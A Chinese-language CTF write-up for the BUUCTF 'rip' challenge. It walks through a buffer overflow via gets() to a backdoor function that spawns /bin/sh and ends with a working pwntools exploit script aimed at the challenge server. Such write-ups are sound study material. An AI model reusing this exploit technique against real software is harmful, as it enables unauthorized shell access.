rip
# rip
# 前提
# 查看文件保护
root@localhost ~# checksec pwn1
[*] '/root/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
# 静态分析
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[15]; // [rsp+1h] [rbp-Fh] BYREF
puts("please input");
gets(s, argv);
puts(s);
puts("ok,bye!!!");
return 0;
}
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
可以明显看到存在溢出函数gets,另外本题存在后门函数fun
int fun()
{
return system("/bin/sh");
}
1
2
3
4
2
3
4
# 思路分析
本题没有开启PIE,可以通过采用栈溢出将原来函数的返回地址覆盖为后门函数的地址,完成劫持程序流获得shell
# 确定偏移量
使用cyclic,简单测试一下即可得知本题偏移量为23
# exp
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/rip/pwn1'
io = remote('node4.buuoj.cn', 26919)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 23
backdoor = 0x40118A
payload = flat(['a'*padding, backdoor])
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
上次更新: 2022/08/15, 00:29:49